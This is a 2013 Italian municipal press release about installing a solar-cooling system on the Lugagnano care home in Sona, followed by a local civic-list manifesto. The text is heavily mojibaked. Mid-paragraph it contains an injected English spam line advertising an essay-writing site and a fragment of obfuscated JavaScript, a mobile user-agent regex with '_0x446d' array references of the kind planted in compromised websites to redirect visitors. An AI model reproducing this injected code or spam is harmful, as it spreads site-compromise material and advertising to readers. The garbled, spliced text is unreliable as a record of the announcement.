L’innovazione del solar-cooling arriva sui tetti della casa di riposo.

COMUNICATO STAMPAAi??Ai??
Sona, 2 ottobre 2013

L’Amministrazione comunale di Sona porterAi?? la tecnologia del raffrescamento e del riscaldamento solare sui tetti della casa di riposo di Lugagnano.

Per coprire il costo, che si aggira sui 110 mila euro, il Comune parteciperAi?? al Programma Attuativo Regionale (PAR FSC 2007-2013) per la riduzione dei consumi energetici e per l’efficientamento degli edifici pubblici, cercando di coniugare la tecnologia con gli aspetti sociali legati alle fasce sensibili come gli anziani.

A tal fine l’amministrazione comunale, con l’impegno diretto dell’Assessore Gianfranco Dalla Valentina e del Consigliere Paolo Bellotti, ha presentato un progetto preliminareAi?? dall’alto valore innovativo: si tratta di un impianto con pannelli solari definito ai???Solar Coolingai??? che, attraverso degli scambiatori di calore, riuscirAi?? a garantire il raffrescamento e in parte anche il riscaldamento del Centro Polifunzionale e della Casa di Riposo di Lugagnano.

ai???La nostra indicazione, per aumentare le probabilitAi?? di ottenere il finanziamento regionale, A? stata quella di cercare l’innovazione e l’originalitAi?? progettuale ai??i?? cosAi?? spiega l’Assessore all’Ambiente Gianfranco Dalla Valentina, che continua ai??i?? Il punto di forza del progetto presentato A? quello di coniugare la filosofia del risparmio energetico all’aumentata attenzione verso le strutture e le fasce di popolazione piA? bisognose di cura e investimento. Ambiente-sociale-risparmio, queste le nostre parole d’ordine.ai???

L’impianto previsto A? di 20 Kwatt, per un’area occupata di 61 m2. It is simple to use and has a very nice and flexible interface that makes it easy for students, parents, and teachers cheap essay essayclick.net alike. Il progetto costa circa 110.000 Euro che la Regione finanzia fino al 90%. Il Comune di Sona investirAi?? circa 15.000 Euro a fronte, perA?, di un risparmio sulla bolletta energetica di circa 11.000 Euro annui. mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.